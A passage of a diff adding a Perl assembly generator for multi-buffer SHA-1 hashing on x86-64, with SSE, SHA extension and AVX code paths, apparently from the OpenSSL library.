+	movdqa	$a,$t3
+
+	movdqa	@Xi[0],`&Xi_off($i)`
+	paddd	@Xi[0],$e			# e+=X[i]
+	 movd		`4*$k-16*4`(@ptr[0]),@Xi[2]
+	psrld	\$27,$t3
+	pxor	$t1,$t0				# Ch(b,c,d)
+	movdqa	$b,$t1
+
+	por	$t3,$t2				# rol(a,5)
+	 movd		`4*$k-16*4`(@ptr[1]),$t3
+	pslld	\$30,$t1
+	paddd	$t0,$e				# e+=Ch(b,c,d)
+
+	psrld	\$2,$b
+	paddd	$t2,$e				# e+=rol(a,5)
+	 pshufb	$tx,@Xi[1]
+	 movd		`4*$k-16*4`(@ptr[2]),$t2
+	por	$t1,$b				# b=rol(b,30)
+___
+$code.=<<___ if ($i==14);			# just load input
+	 movd		`4*$j-16*4`(@ptr[3]),$t1
+	 punpckldq	$t2,@Xi[1]
+	movdqa	$a,$t2
+	paddd	$K,$e				# e+=K_00_19
+	 punpckldq	$t1,$t3
+	movdqa	$b,$t1
+	movdqa	$b,$t0
+	pslld	\$5,$t2
+	 prefetcht0	63(@ptr[0])
+	pandn	$d,$t1
+	pand	$c,$t0
+	 punpckldq	$t3,@Xi[1]
+	movdqa	$a,$t3
+
+	movdqa	@Xi[0],`&Xi_off($i)`
+	paddd	@Xi[0],$e			# e+=X[i]
+	psrld	\$27,$t3
+	pxor	$t1,$t0				# Ch(b,c,d)
+	movdqa	$b,$t1
+	 prefetcht0	63(@ptr[1])
+
+	por	$t3,$t2				# rol(a,5)
+	pslld	\$30,$t1
+	paddd	$t0,$e				# e+=Ch(b,c,d)
+	 prefetcht0	63(@ptr[2])
+
+	psrld	\$2,$b
+	paddd	$t2,$e				# e+=rol(a,5)
+	 pshufb	$tx,@Xi[1]
+	 prefetcht0	63(@ptr[3])
+	por	$t1,$b				# b=rol(b,30)
+___
+$code.=<<___ if ($i>=13 && $i<15);
+	movdqa	`&Xi_off($j+2)`,@Xi[3]		# preload "X[2]"
+___
+$code.=<<___ if ($i>=15);			# apply Xupdate
+	pxor	@Xi[-2],@Xi[1]			# "X[13]"
+	movdqa	`&Xi_off($j+2)`,@Xi[3]		# "X[2]"
+
+	movdqa	$a,$t2
+	 pxor	`&Xi_off($j+8)`,@Xi[1]
+	paddd	$K,$e				# e+=K_00_19
+	movdqa	$b,$t1
+	pslld	\$5,$t2
+	 pxor	@Xi[3],@Xi[1]
+	movdqa	$b,$t0
+	pandn	$d,$t1
+	 movdqa	@Xi[1],$tx
+	pand	$c,$t0
+	movdqa	$a,$t3
+	 psrld	\$31,$tx
+	 paddd	@Xi[1],@Xi[1]
+
+	movdqa	@Xi[0],`&Xi_off($i)`
+	paddd	@Xi[0],$e			# e+=X[i]
+	psrld	\$27,$t3
+	pxor	$t1,$t0				# Ch(b,c,d)
+
+	movdqa	$b,$t1
+	por	$t3,$t2				# rol(a,5)
+	pslld	\$30,$t1
+	paddd	$t0,$e				# e+=Ch(b,c,d)
+
+	psrld	\$2,$b
+	paddd	$t2,$e				# e+=rol(a,5)
+	 por	$tx,@Xi[1]			# rol	\$1,@Xi[1]
+	por	$t1,$b				# b=rol(b,30)
+___
+push(@Xi,shift(@Xi));
+}
+
+sub BODY_20_39 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+
+$code.=<<___ if ($i<79);
+	pxor	@Xi[-2],@Xi[1]			# "X[13]"
+	movdqa	`&Xi_off($j+2)`,@Xi[3]		# "X[2]"
+
+	movdqa	$a,$t2
+	movdqa	$d,$t0
+	 pxor	`&Xi_off($j+8)`,@Xi[1]
+	paddd	$K,$e				# e+=K_20_39
+	pslld	\$5,$t2
+	pxor	$b,$t0
+
+	movdqa	$a,$t3
+___
+$code.=<<___ if ($i<72);
+	movdqa	@Xi[0],`&Xi_off($i)`
+___
+$code.=<<___ if ($i<79);
+	paddd	@Xi[0],$e			# e+=X[i]
+	 pxor	@Xi[3],@Xi[1]
+	psrld	\$27,$t3
+	pxor	$c,$t0				# Parity(b,c,d)
+	movdqa	$b,$t1
+
+	pslld	\$30,$t1
+	 movdqa	@Xi[1],$tx
+	por	$t3,$t2				# rol(a,5)
+	 psrld	\$31,$tx
+	paddd	$t0,$e				# e+=Parity(b,c,d)
+	 paddd	@Xi[1],@Xi[1]
+
+	psrld	\$2,$b
+	paddd	$t2,$e				# e+=rol(a,5)
+	 por	$tx,@Xi[1]			# rol(@Xi[1],1)
+	por	$t1,$b				# b=rol(b,30)
+___
+$code.=<<___ if ($i==79);
+	movdqa	$a,$t2
+	paddd	$K,$e				# e+=K_20_39
+	movdqa	$d,$t0
+	pslld	\$5,$t2
+	pxor	$b,$t0
+
+	movdqa	$a,$t3
+	paddd	@Xi[0],$e			# e+=X[i]
+	psrld	\$27,$t3
+	movdqa	$b,$t1
+	pxor	$c,$t0				# Parity(b,c,d)
+
+	pslld	\$30,$t1
+	por	$t3,$t2				# rol(a,5)
+	paddd	$t0,$e				# e+=Parity(b,c,d)
+
+	psrld	\$2,$b
+	paddd	$t2,$e				# e+=rol(a,5)
+	por	$t1,$b				# b=rol(b,30)
+___
+push(@Xi,shift(@Xi));
+}
+
+sub BODY_40_59 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+
+$code.=<<___;
+	pxor	@Xi[-2],@Xi[1]			# "X[13]"
+	movdqa	`&Xi_off($j+2)`,@Xi[3]		# "X[2]"
+
+	movdqa	$a,$t2
+	movdqa	$d,$t1
+	 pxor	`&Xi_off($j+8)`,@Xi[1]
+	pxor	@Xi[3],@Xi[1]
+	paddd	$K,$e				# e+=K_40_59
+	pslld	\$5,$t2
+	movdqa	$a,$t3
+	pand	$c,$t1
+
+	movdqa	$d,$t0
+	 movdqa	@Xi[1],$tx
+	psrld	\$27,$t3
+	paddd	$t1,$e
+	pxor	$c,$t0
+
+	movdqa	@Xi[0],`&Xi_off($i)`
+	paddd	@Xi[0],$e			# e+=X[i]
+	por	$t3,$t2				# rol(a,5)
+	 psrld	\$31,$tx
+	pand	$b,$t0
+	movdqa	$b,$t1
+
+	pslld	\$30,$t1
+	 paddd	@Xi[1],@Xi[1]
+	paddd	$t0,$e				# e+=Maj(b,d,c)
+
+	psrld	\$2,$b
+	paddd	$t2,$e				# e+=rol(a,5)
+	 por	$tx,@Xi[1]			# rol(@X[1],1)
+	por	$t1,$b				# b=rol(b,30)
+___
+push(@Xi,shift(@Xi));
+}
+
+$code.=<<___;
+.text
+
+.extern	OPENSSL_ia32cap_P
+
+.globl	sha1_multi_block
+.type	sha1_multi_block,\@function,3
+.align	32
+sha1_multi_block:
+	mov	OPENSSL_ia32cap_P+4(%rip),%rcx
+	bt	\$61,%rcx			# check SHA bit
+	jc	_shaext_shortcut
+___
+$code.=<<___ if ($avx);
+	test	\$`1<<28`,%ecx
+	jnz	_avx_shortcut
+___
+$code.=<<___;
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,-0x78(%rax)
+	movaps	%xmm11,-0x68(%rax)
+	movaps	%xmm12,-0x58(%rax)
+	movaps	%xmm13,-0x48(%rax)
+	movaps	%xmm14,-0x38(%rax)
+	movaps	%xmm15,-0x28(%rax)
+___
+$code.=<<___;
+	sub	\$`$REG_SZ*18`,%rsp
+	and	\$-256,%rsp
+	mov	%rax,`$REG_SZ*17`(%rsp)		# original %rsp
+.Lbody:
+	lea	K_XX_XX(%rip),$Tbl
+	lea	`$REG_SZ*16`(%rsp),%rbx
+
+.Loop_grande:
+	mov	$num,`$REG_SZ*17+8`(%rsp)	# original $num
+	xor	$num,$num
+___
+for($i=0;$i<4;$i++) {
+    $code.=<<___;
+	mov	`16*$i+0`($inp),@ptr[$i]	# input pointer
+	mov	`16*$i+8`($inp),%ecx		# number of blocks
+	cmp	$num,%ecx
+	cmovg	%ecx,$num			# find maximum
+	test	%ecx,%ecx
+	mov	%ecx,`4*$i`(%rbx)		# initialize counters
+	cmovle	$Tbl,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	test	$num,$num
+	jz	.Ldone
+
+	movdqu	0x00($ctx),$A			# load context
+	 lea	128(%rsp),%rax
+	movdqu	0x20($ctx),$B
+	movdqu	0x40($ctx),$C
+	movdqu	0x60($ctx),$D
+	movdqu	0x80($ctx),$E
+	movdqa	0x60($Tbl),$tx			# pbswap_mask
+	movdqa	-0x20($Tbl),$K			# K_00_19
+	jmp	.Loop
+
+.align	32
+.Loop:
+___
+for($i=0;$i<20;$i++)	{ &BODY_00_19($i,@V); unshift(@V,pop(@V)); }
+$code.="	movdqa	0x00($Tbl),$K\n";	# K_20_39
+for(;$i<40;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.="	movdqa	0x20($Tbl),$K\n";	# K_40_59
+for(;$i<60;$i++)	{ &BODY_40_59($i,@V); unshift(@V,pop(@V)); }
+$code.="	movdqa	0x40($Tbl),$K\n";	# K_60_79
+for(;$i<80;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	movdqa	(%rbx),@Xi[0]			# pull counters
+	mov	\$1,%ecx
+	cmp	4*0(%rbx),%ecx			# examinte counters
+	pxor	$t2,$t2
+	cmovge	$Tbl,@ptr[0]			# cancel input
+	cmp	4*1(%rbx),%ecx
+	movdqa	@Xi[0],@Xi[1]
+	cmovge	$Tbl,@ptr[1]
+	cmp	4*2(%rbx),%ecx
+	pcmpgtd	$t2,@Xi[1]			# mask value
+	cmovge	$Tbl,@ptr[2]
+	cmp	4*3(%rbx),%ecx
+	paddd	@Xi[1],@Xi[0]			# counters--
+	cmovge	$Tbl,@ptr[3]
+
+	movdqu	0x00($ctx),$t0
+	pand	@Xi[1],$A
+	movdqu	0x20($ctx),$t1
+	pand	@Xi[1],$B
+	paddd	$t0,$A
+	movdqu	0x40($ctx),$t2
+	pand	@Xi[1],$C
+	paddd	$t1,$B
+	movdqu	0x60($ctx),$t3
+	pand	@Xi[1],$D
+	paddd	$t2,$C
+	movdqu	0x80($ctx),$tx
+	pand	@Xi[1],$E
+	movdqu	$A,0x00($ctx)
+	paddd	$t3,$D
+	movdqu	$B,0x20($ctx)
+	paddd	$tx,$E
+	movdqu	$C,0x40($ctx)
+	movdqu	$D,0x60($ctx)
+	movdqu	$E,0x80($ctx)
+
+	movdqa	@Xi[0],(%rbx)			# save counters
+	movdqa	0x60($Tbl),$tx			# pbswap_mask
+	movdqa	-0x20($Tbl),$K			# K_00_19
+	dec	$num
+	jnz	.Loop
+
+	mov	`$REG_SZ*17+8`(%rsp),$num
+	lea	$REG_SZ($ctx),$ctx
+	lea	`16*$REG_SZ/4`($inp),$inp
+	dec	$num
+	jnz	.Loop_grande
+
+.Ldone:
+	mov	`$REG_SZ*17`(%rsp),%rax		# orignal %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	-0xb8(%rax),%xmm6
+	movaps	-0xa8(%rax),%xmm7
+	movaps	-0x98(%rax),%xmm8
+	movaps	-0x88(%rax),%xmm9
+	movaps	-0x78(%rax),%xmm10
+	movaps	-0x68(%rax),%xmm11
+	movaps	-0x58(%rax),%xmm12
+	movaps	-0x48(%rax),%xmm13
+	movaps	-0x38(%rax),%xmm14
+	movaps	-0x28(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Lepilogue:
+	ret
+.size	sha1_multi_block,.-sha1_multi_block
+___
+						{{{
+my ($ABCD0,$E0,$E0_,$BSWAP,$ABCD1,$E1,$E1_)=map("%xmm$_",(0..3,8..10));
+my @MSG0=map("%xmm$_",(4..7));
+my @MSG1=map("%xmm$_",(11..14));
+
+$code.=<<___;
+.type	sha1_multi_block_shaext,\@function,3
+.align	32
+sha1_multi_block_shaext:
+_shaext_shortcut:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,-0x78(%rax)
+	movaps	%xmm11,-0x68(%rax)
+	movaps	%xmm12,-0x58(%rax)
+	movaps	%xmm13,-0x48(%rax)
+	movaps	%xmm14,-0x38(%rax)
+	movaps	%xmm15,-0x28(%rax)
+___
+$code.=<<___;
+	sub	\$`$REG_SZ*18`,%rsp
+	shl	\$1,$num			# we process pair at a time
+	and	\$-256,%rsp
+	lea	0x40($ctx),$ctx			# size optimization
+	mov	%rax,`$REG_SZ*17`(%rsp)		# original %rsp
+.Lbody_shaext:
+	lea	`$REG_SZ*16`(%rsp),%rbx
+	movdqa	K_XX_XX+0x80(%rip),$BSWAP	# byte-n-word swap
+
+.Loop_grande_shaext:
+	mov	$num,`$REG_SZ*17+8`(%rsp)	# orignal $num
+	xor	$num,$num
+___
+for($i=0;$i<2;$i++) {
+    $code.=<<___;
+	mov	`16*$i+0`($inp),@ptr[$i]	# input pointer
+	mov	`16*$i+8`($inp),%ecx		# number of blocks
+	cmp	$num,%ecx
+	cmovg	%ecx,$num			# find maximum
+	test	%ecx,%ecx
+	mov	%ecx,`4*$i`(%rbx)		# initialize counters
+	cmovle	%rsp,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	test	$num,$num
+	jz	.Ldone_shaext
+
+	movq		0x00-0x40($ctx),$ABCD0	# a1.a0
+	movq		0x20-0x40($ctx),@MSG0[0]# b1.b0
+	movq		0x40-0x40($ctx),@MSG0[1]# c1.c0
+	movq		0x60-0x40($ctx),@MSG0[2]# d1.d0
+	movq		0x80-0x40($ctx),@MSG0[3]# e1.e0
+
+	punpckldq	@MSG0[0],$ABCD0		# b1.a1.b0.a0
+	punpckldq	@MSG0[2],@MSG0[1]	# d1.c1.d0.c0
+
+	movdqa		$ABCD0,$ABCD1
+	punpcklqdq	@MSG0[1],$ABCD0		# d0.c0.b0.a0
+	punpckhqdq	@MSG0[1],$ABCD1		# d1.c1.b1.a1
+
+	pshufd		\$0b00111111,@MSG0[3],$E0
+	pshufd		\$0b01111111,@MSG0[3],$E1
+	pshufd		\$0b00011011,$ABCD0,$ABCD0
+	pshufd		\$0b00011011,$ABCD1,$ABCD1
+	jmp		.Loop_shaext
+
+.align	32
+.Loop_shaext:
+	movdqu		0x00(@ptr[0]),@MSG0[0]
+	 movdqu		0x00(@ptr[1]),@MSG1[0]
+	movdqu		0x10(@ptr[0]),@MSG0[1]
+	 movdqu		0x10(@ptr[1]),@MSG1[1]
+	movdqu		0x20(@ptr[0]),@MSG0[2]
+	pshufb		$BSWAP,@MSG0[0]
+	 movdqu		0x20(@ptr[1]),@MSG1[2]
+	 pshufb		$BSWAP,@MSG1[0]
+	movdqu		0x30(@ptr[0]),@MSG0[3]
+	lea		0x40(@ptr[0]),@ptr[0]
+	pshufb		$BSWAP,@MSG0[1]
+	 movdqu		0x30(@ptr[1]),@MSG1[3]
+	 lea		0x40(@ptr[1]),@ptr[1]
+	 pshufb		$BSWAP,@MSG1[1]
+
+	movdqa		$E0,0x50(%rsp)		# offload
+	paddd		@MSG0[0],$E0
+	 movdqa		$E1,0x70(%rsp)
+	 paddd		@MSG1[0],$E1
+	movdqa		$ABCD0,0x40(%rsp)	# offload
+	movdqa		$ABCD0,$E0_
+	 movdqa		$ABCD1,0x60(%rsp)
+	 movdqa		$ABCD1,$E1_
+	sha1rnds4	\$0,$E0,$ABCD0		# 0-3
+	sha1nexte	@MSG0[1],$E0_
+	 sha1rnds4	\$0,$E1,$ABCD1		# 0-3
+	 sha1nexte	@MSG1[1],$E1_
+	pshufb		$BSWAP,@MSG0[2]
+	prefetcht0	127(@ptr[0])
+	sha1msg1	@MSG0[1],@MSG0[0]
+	 pshufb		$BSWAP,@MSG1[2]
+	 prefetcht0	127(@ptr[1])
+	 sha1msg1	@MSG1[1],@MSG1[0]
+
+	pshufb		$BSWAP,@MSG0[3]
+	movdqa		$ABCD0,$E0
+	 pshufb		$BSWAP,@MSG1[3]
+	 movdqa		$ABCD1,$E1
+	sha1rnds4	\$0,$E0_,$ABCD0		# 4-7
+	sha1nexte	@MSG0[2],$E0
+	 sha1rnds4	\$0,$E1_,$ABCD1		# 4-7
+	 sha1nexte	@MSG1[2],$E1
+	pxor		@MSG0[2],@MSG0[0]
+	sha1msg1	@MSG0[2],@MSG0[1]
+	 pxor		@MSG1[2],@MSG1[0]
+	 sha1msg1	@MSG1[2],@MSG1[1]
+___
+for($i=2;$i<20-4;$i++) {
+$code.=<<___;
+	movdqa		$ABCD0,$E0_
+	 movdqa		$ABCD1,$E1_
+	sha1rnds4	\$`int($i/5)`,$E0,$ABCD0	# 8-11
+	sha1nexte	@MSG0[3],$E0_
+	 sha1rnds4	\$`int($i/5)`,$E1,$ABCD1	# 8-11
+	 sha1nexte	@MSG1[3],$E1_
+	sha1msg2	@MSG0[3],@MSG0[0]
+	 sha1msg2	@MSG1[3],@MSG1[0]
+	pxor		@MSG0[3],@MSG0[1]
+	sha1msg1	@MSG0[3],@MSG0[2]
+	 pxor		@MSG1[3],@MSG1[1]
+	 sha1msg1	@MSG1[3],@MSG1[2]
+___
+	($E0,$E0_)=($E0_,$E0);		($E1,$E1_)=($E1_,$E1);
+	push(@MSG0,shift(@MSG0));	push(@MSG1,shift(@MSG1));
+}
+$code.=<<___;
+	movdqa		$ABCD0,$E0_
+	 movdqa		$ABCD1,$E1_
+	sha1rnds4	\$3,$E0,$ABCD0		# 64-67
+	sha1nexte	@MSG0[3],$E0_
+	 sha1rnds4	\$3,$E1,$ABCD1		# 64-67
+	 sha1nexte	@MSG1[3],$E1_
+	sha1msg2	@MSG0[3],@MSG0[0]
+	 sha1msg2	@MSG1[3],@MSG1[0]
+	pxor		@MSG0[3],@MSG0[1]
+	 pxor		@MSG1[3],@MSG1[1]
+
+	mov		\$1,%ecx
+	pxor		@MSG0[2],@MSG0[2]	# zero
+	cmp		4*0(%rbx),%ecx		# examine counters
+	cmovge		%rsp,@ptr[0]		# cancel input
+
+	movdqa		$ABCD0,$E0
+	 movdqa		$ABCD1,$E1
+	sha1rnds4	\$3,$E0_,$ABCD0		# 68-71
+	sha1nexte	@MSG0[0],$E0
+	 sha1rnds4	\$3,$E1_,$ABCD1		# 68-71
+	 sha1nexte	@MSG1[0],$E1
+	sha1msg2	@MSG0[0],@MSG0[1]
+	 sha1msg2	@MSG1[0],@MSG1[1]
+
+	cmp		4*1(%rbx),%ecx
+	cmovge		%rsp,@ptr[1]
+	movq		(%rbx),@MSG0[0]		# pull counters
+
+	movdqa		$ABCD0,$E0_
+	 movdqa		$ABCD1,$E1_
+	sha1rnds4	\$3,$E0,$ABCD0		# 72-75
+	sha1nexte	@MSG0[1],$E0_
+	 sha1rnds4	\$3,$E1,$ABCD1		# 72-75
+	 sha1nexte	@MSG1[1],$E1_
+
+	pshufd		\$0x00,@MSG0[0],@MSG1[2]
+	pshufd		\$0x55,@MSG0[0],@MSG1[3]
+	movdqa		@MSG0[0],@MSG0[1]
+	pcmpgtd		@MSG0[2],@MSG1[2]
+	pcmpgtd		@MSG0[2],@MSG1[3]
+
+	movdqa		$ABCD0,$E0
+	 movdqa		$ABCD1,$E1
+	sha1rnds4	\$3,$E0_,$ABCD0		# 76-79
+	sha1nexte	$MSG0[2],$E0
+	 sha1rnds4	\$3,$E1_,$ABCD1		# 76-79
+	 sha1nexte	$MSG0[2],$E1
+
+	pcmpgtd		@MSG0[2],@MSG0[1]	# counter mask
+	pand		@MSG1[2],$ABCD0
+	pand		@MSG1[2],$E0
+	 pand		@MSG1[3],$ABCD1
+	 pand		@MSG1[3],$E1
+	paddd		@MSG0[1],@MSG0[0]	# counters--
+
+	paddd		0x40(%rsp),$ABCD0
+	paddd		0x50(%rsp),$E0
+	 paddd		0x60(%rsp),$ABCD1
+	 paddd		0x70(%rsp),$E1
+
+	movq		@MSG0[0],(%rbx)		# save counters
+	dec		$num
+	jnz		.Loop_shaext
+
+	mov		`$REG_SZ*17+8`(%rsp),$num
+
+	pshufd		\$0b00011011,$ABCD0,$ABCD0
+	pshufd		\$0b00011011,$ABCD1,$ABCD1
+
+	movdqa		$ABCD0,@MSG0[0]
+	punpckldq	$ABCD1,$ABCD0		# b1.b0.a1.a0
+	punpckhdq	$ABCD1,@MSG0[0]		# d1.d0.c1.c0
+	punpckhdq	$E1,$E0			# e1.e0.xx.xx
+	movq		$ABCD0,0x00-0x40($ctx)	# a1.a0
+	psrldq		\$8,$ABCD0
+	movq		@MSG0[0],0x40-0x40($ctx)# c1.c0
+	psrldq		\$8,@MSG0[0]
+	movq		$ABCD0,0x20-0x40($ctx)	# b1.b0
+	psrldq		\$8,$E0
+	movq		@MSG0[0],0x60-0x40($ctx)# d1.d0
+	movq		$E0,0x80-0x40($ctx)	# e1.e0
+
+	lea	`$REG_SZ/2`($ctx),$ctx
+	lea	`16*2`($inp),$inp
+	dec	$num
+	jnz	.Loop_grande_shaext
+
+.Ldone_shaext:
+	#mov	`$REG_SZ*17`(%rsp),%rax		# original %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	-0xb8(%rax),%xmm6
+	movaps	-0xa8(%rax),%xmm7
+	movaps	-0x98(%rax),%xmm8
+	movaps	-0x88(%rax),%xmm9
+	movaps	-0x78(%rax),%xmm10
+	movaps	-0x68(%rax),%xmm11
+	movaps	-0x58(%rax),%xmm12
+	movaps	-0x48(%rax),%xmm13
+	movaps	-0x38(%rax),%xmm14
+	movaps	-0x28(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Lepilogue_shaext:
+	ret
+.size	sha1_multi_block_shaext,.-sha1_multi_block_shaext
+___
+						}}}
+
+						if ($avx) {{{
+sub BODY_00_19_avx {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+my $k=$i+2;
+my $vpack = $REG_SZ==16 ? "vpunpckldq" : "vinserti128";
+my $ptr_n = $REG_SZ==16 ? @ptr[1] : @ptr[4];
+
+$code.=<<___ if ($i==0 && $REG_SZ==16);
+	vmovd		(@ptr[0]),@Xi[0]
+	 lea		`16*4`(@ptr[0]),@ptr[0]
+	vmovd		(@ptr[1]),@Xi[2]	# borrow Xi[2]
+	 lea		`16*4`(@ptr[1]),@ptr[1]
+	vpinsrd		\$1,(@ptr[2]),@Xi[0],@Xi[0]
+	 lea		`16*4`(@ptr[2]),@ptr[2]
+	vpinsrd		\$1,(@ptr[3]),@Xi[2],@Xi[2]
+	 lea		`16*4`(@ptr[3]),@ptr[3]
+	 vmovd		`4*$j-16*4`(@ptr[0]),@Xi[1]
+	vpunpckldq	@Xi[2],@Xi[0],@Xi[0]
+	 vmovd		`4*$j-16*4`($ptr_n),$t3
+	vpshufb		$tx,@Xi[0],@Xi[0]
+___
+$code.=<<___ if ($i<15 && $REG_SZ==16);		# just load input
+	 vpinsrd	\$1,`4*$j-16*4`(@ptr[2]),@Xi[1],@Xi[1]
+	 vpinsrd	\$1,`4*$j-16*4`(@ptr[3]),$t3,$t3
+___
+$code.=<<___ if ($i==0 && $REG_SZ==32);
+	vmovd		(@ptr[0]),@Xi[0]
+	 lea		`16*4`(@ptr[0]),@ptr[0]
+	vmovd		(@ptr[4]),@Xi[2]	# borrow Xi[2]
+	 lea		`16*4`(@ptr[4]),@ptr[4]
+	vmovd		(@ptr[1]),$t2
+	 lea		`16*4`(@ptr[1]),@ptr[1]
+	vmovd		(@ptr[5]),$t1
+	 lea		`16*4`(@ptr[5]),@ptr[5]
+	vpinsrd		\$1,(@ptr[2]),@Xi[0],@Xi[0]
+	 lea		`16*4`(@ptr[2]),@ptr[2]
+	vpinsrd		\$1,(@ptr[6]),@Xi[2],@Xi[2]
+	 lea		`16*4`(@ptr[6]),@ptr[6]
+	vpinsrd		\$1,(@ptr[3]),$t2,$t2
+	 lea		`16*4`(@ptr[3]),@ptr[3]
+	vpunpckldq	$t2,@Xi[0],@Xi[0]
+	vpinsrd		\$1,(@ptr[7]),$t1,$t1
+	 lea		`16*4`(@ptr[7]),@ptr[7]
+	vpunpckldq	$t1,@Xi[2],@Xi[2]
+	 vmovd		`4*$j-16*4`(@ptr[0]),@Xi[1]
+	vinserti128	@Xi[2],@Xi[0],@Xi[0]
+	 vmovd		`4*$j-16*4`($ptr_n),$t3
+	vpshufb		$tx,@Xi[0],@Xi[0]
+___
+$code.=<<___ if ($i<15 && $REG_SZ==32);		# just load input
+	 vmovd		`4*$j-16*4`(@ptr[1]),$t2
+	 vmovd		`4*$j-16*4`(@ptr[5]),$t1
+	 vpinsrd	\$1,`4*$j-16*4`(@ptr[2]),@Xi[1],@Xi[1]
+	 vpinsrd	\$1,`4*$j-16*4`(@ptr[6]),$t3,$t3
+	 vpinsrd	\$1,`4*$j-16*4`(@ptr[3]),$t2,$t2
+	 vpunpckldq	$t2,@Xi[1],@Xi[1]
+	 vpinsrd	\$1,`4*$j-16*4`(@ptr[7]),$t1,$t1
+	 vpunpckldq	$t1,$t3,$t3
+___
+$code.=<<___ if ($i<14);
+	vpaddd	$K,$e,$e			# e+=K_00_19
+	vpslld	\$5,$a,$t2
+	vpandn	$d,$b,$t1
+	vpand	$c,$b,$t0
+
+	vmovdqa	@Xi[0],`&Xi_off($i)`
+	vpaddd	@Xi[0],$e,$e			# e+=X[i]
+	 $vpack		$t3,@Xi[1],@Xi[1]
+	vpsrld	\$27,$a,$t3
+	vpxor	$t1,$t0,$t0			# Ch(b,c,d)
+	 vmovd		`4*$k-16*4`(@ptr[0]),@Xi[2]
+
+	vpslld	\$30,$b,$t1
+	vpor	$t3,$t2,$t2			# rol(a,5)
+	 vmovd		`4*$k-16*4`($ptr_n),$t3
+	vpaddd	$t0,$e,$e			# e+=Ch(b,c,d)
+
+	vpsrld	\$2,$b,$b
+	vpaddd	$t2,$e,$e			# e+=rol(a,5)
+	 vpshufb	$tx,@Xi[1],@Xi[1]
+	vpor	$t1,$b,$b			# b=rol(b,30)
+___
+$code.=<<___ if ($i==14);
+	vpaddd	$K,$e,$e			# e+=K_00_19
+	 prefetcht0	63(@ptr[0])
+	vpslld	\$5,$a,$t2
+	vpandn	$d,$b,$t1
+	vpand	$c,$b,$t0
+
+	vmovdqa	@Xi[0],`&Xi_off($i)`
+	vpaddd	@Xi[0],$e,$e			# e+=X[i]
+	 $vpack		$t3,@Xi[1],@Xi[1]
+	vpsrld	\$27,$a,$t3
+	 prefetcht0	63(@ptr[1])
+	vpxor	$t1,$t0,$t0			# Ch(b,c,d)
+
+	vpslld	\$30,$b,$t1
+	vpor	$t3,$t2,$t2			# rol(a,5)
+	 prefetcht0	63(@ptr[2])
+	vpaddd	$t0,$e,$e			# e+=Ch(b,c,d)
+
+	vpsrld	\$2,$b,$b
+	vpaddd	$t2,$e,$e			# e+=rol(a,5)
+	 prefetcht0	63(@ptr[3])
+	 vpshufb	$tx,@Xi[1],@Xi[1]
+	vpor	$t1,$b,$b			# b=rol(b,30)
+___
+$code.=<<___ if ($i>=13 && $i<15);
+	vmovdqa	`&Xi_off($j+2)`,@Xi[3]		# preload "X[2]"
+___
+$code.=<<___ if ($i>=15);			# apply Xupdate
+	vpxor	@Xi[-2],@Xi[1],@Xi[1]		# "X[13]"
+	vmovdqa	`&Xi_off($j+2)`,@Xi[3]		# "X[2]"
+
+	vpaddd	$K,$e,$e			# e+=K_00_19
+	vpslld	\$5,$a,$t2
+	vpandn	$d,$b,$t1
+	 `"prefetcht0	63(@ptr[4])"		if ($i==15 && $REG_SZ==32)`
+	vpand	$c,$b,$t0
+
+	vmovdqa	@Xi[0],`&Xi_off($i)`
+	vpaddd	@Xi[0],$e,$e			# e+=X[i]
+	 vpxor	`&Xi_off($j+8)`,@Xi[1],@Xi[1]
+	vpsrld	\$27,$a,$t3
+	vpxor	$t1,$t0,$t0			# Ch(b,c,d)
+	 vpxor	@Xi[3],@Xi[1],@Xi[1]
+	 `"prefetcht0	63(@ptr[5])"		if ($i==15 && $REG_SZ==32)`
+
+	vpslld	\$30,$b,$t1
+	vpor	$t3,$t2,$t2			# rol(a,5)
+	vpaddd	$t0,$e,$e			# e+=Ch(b,c,d)
+	 `"prefetcht0	63(@ptr[6])"		if ($i==15 && $REG_SZ==32)`
+	 vpsrld	\$31,@Xi[1],$tx
+	 vpaddd	@Xi[1],@Xi[1],@Xi[1]
+
+	vpsrld	\$2,$b,$b
+	 `"prefetcht0	63(@ptr[7])"		if ($i==15 && $REG_SZ==32)`
+	vpaddd	$t2,$e,$e			# e+=rol(a,5)
+	 vpor	$tx,@Xi[1],@Xi[1]		# rol	\$1,@Xi[1]
+	vpor	$t1,$b,$b			# b=rol(b,30)
+___
+push(@Xi,shift(@Xi));
+}
+
+sub BODY_20_39_avx {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+
+$code.=<<___ if ($i<79);
+	vpxor	@Xi[-2],@Xi[1],@Xi[1]		# "X[13]"
+	vmovdqa	`&Xi_off($j+2)`,@Xi[3]		# "X[2]"
+
+	vpslld	\$5,$a,$t2
+	vpaddd	$K,$e,$e			# e+=K_20_39
+	vpxor	$b,$d,$t0
+___
+$code.=<<___ if ($i<72);
+	vmovdqa	@Xi[0],`&Xi_off($i)`
+___
+$code.=<<___ if ($i<79);
+	vpaddd	@Xi[0],$e,$e			# e+=X[i]
+	 vpxor	`&Xi_off($j+8)`,@Xi[1],@Xi[1]
